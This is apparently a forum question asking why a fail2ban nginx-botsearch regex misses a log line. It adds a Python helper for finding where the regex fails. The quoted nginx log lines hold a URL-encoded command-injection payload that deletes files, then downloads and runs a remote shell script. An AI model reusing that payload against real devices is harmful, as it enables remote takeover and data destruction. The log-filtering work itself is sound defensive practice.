In my fail2ban configuration, the filter nginx-botsearch.conf (the one shipped with Ubuntu 22.04.4 LTS) is activated.
Please help me debug the behavior of this regular expression:
^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: <HOST>\, server\: \S*\, request: \"(GET|POST|HEAD) \/<block> \S+\"\, .*?$
This regex does catch these log lines:
2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
But it fails to match this line (very similar):
2024/05/08 11:55:04 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"
Trying to debug it with some online tools does not highlight any particular reason.
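One way to localize where such a failregex stops matching, as an added example that is not part of the original post or of fail2ban: it expands the `<HOST>` and `<block>` tags, strips the timestamp as fail2ban does, and reports the longest prefix of the regex that still matches. The tag values are assumed to be those of the stock `botsearch-common.conf`, `<HOST>` is a simplified IPv4 stand-in, and `CGI_LINE`, `expand` and `locate_failure` are names made up for this sketch.

```python
import re

# Failregex exactly as posted in the question (nginx-botsearch.conf).
FAILREGEX = (r'^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) '
             r'\(2\: No such file or directory\), client\: <HOST>\, server\: \S*\, '
             r'request: \"(GET|POST|HEAD) \/<block> \S+\"\, .*?$')

# ASSUMPTION: tag values as in fail2ban's stock botsearch-common.conf; compare
# with /etc/fail2ban/filter.d/botsearch-common.conf on your own host.
TAGS = {
    "webmail": r"roundcube|(ext)?mail|horde|(v-?)?webmail",
    "phpmyadmin": r"(typo3/|xampp/|admin/|)(pma|(php)?[Mm]y[Aa]dmin)",
    "wordpress": r"wp-(login|signup|admin)\.php",
    "block": r"\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin)[^,]*",
    "HOST": r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})",  # simplified IPv4 stand-in
}
DATE = re.compile(r"^\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}")  # fail2ban strips this first

# GIT_LINE is the unmatched line from the question; CGI_LINE is constructed.
GIT_LINE = ('2024/05/08 11:55:04 [error] 637#637: *7233 open() '
            '"/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), '
            'client: 31.7.62.226, server: node-c.myhost.com, '
            'request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"')
CGI_LINE = ('2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/cgi-bin/test" '
            'failed (2: No such file or directory), client: 192.0.2.10, '
            'server: example.test, request: "GET /cgi-bin/test HTTP/1.1", host: "example.test"')

def expand(pattern):
    """Recursively substitute <tag> references; unknown tags are left untouched."""
    return re.sub(r"<(\w+)>",
                  lambda m: expand(TAGS[m.group(1)]) if m.group(1) in TAGS else m.group(0),
                  pattern)

def locate_failure(line):
    """Return None on a full match, else (text consumed, unmatched regex tail)."""
    rest, full = DATE.sub("", line), expand(FAILREGEX)
    if re.search(full, rest):
        return None
    for cut in range(len(full) - 1, 0, -1):   # longest compilable prefix that matches
        try:
            m = re.match(full[:cut], rest)
        except re.error:                      # cut fell inside a group or an escape
            continue
        if m:
            return m.group(0), full[cut:]
    return "", full
```

With the assumed tag values, `locate_failure(GIT_LINE)` stops right after `request: "GET /`, at the alternation that `<block>` expands to, which is the point to inspect in the filter. Running `fail2ban-regex` with the log file and the filter file as arguments checks the same thing against the real configuration.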